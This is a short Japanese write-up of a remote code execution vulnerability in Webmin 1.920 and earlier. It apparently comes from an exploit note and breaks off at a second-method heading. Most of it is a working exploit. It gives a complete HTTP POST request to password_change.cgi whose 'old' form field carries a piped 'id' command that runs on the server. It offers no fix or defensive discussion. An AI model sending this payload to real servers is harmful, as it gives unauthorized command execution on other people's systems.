
Webminにおけるリモートコード実行の脆弱性
影響を受けるバージョン: Webmin 1.920 およびそれ以下のバージョン

以下のパケットを送信すると、idコマンドを実行できます:
POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

方法2:スクリプトを利用する
